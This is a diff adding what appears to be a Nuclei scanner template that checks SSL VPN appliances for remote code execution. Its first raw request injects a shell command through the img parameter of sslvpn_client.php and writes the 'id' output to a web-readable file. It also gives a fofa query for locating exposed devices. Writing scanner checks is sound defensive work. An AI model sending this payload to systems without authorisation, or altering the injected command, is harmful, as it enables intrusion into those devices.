diff --git a/http/vulnerabilities/other/sslvpn-client-rce.yaml b/http/vulnerabilities/other/sslvpn-client-rce.yaml
new file mode 100644
index 0000000000..ed2717f572
--- /dev/null
+++ b/http/vulnerabilities/other/sslvpn-client-rce.yaml
@@ -0,0 +1,39 @@
+id: sslvpn-client-rce
+
+info:
+  name: SSL VPN Client - Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://github.com/server2565543706/Poc/blob/master/POC/anquantongsha.py
+    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/security_products_rce.py
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="/webui/images/default/default/alert_close.jpg"
+  tags: sslvpn,rce,intrusive
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        GET /sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /sslvpn/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_2
+        regex:
+          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
+
+      - type: word
+        part: header_2
+        words:
+          - 'text/plain'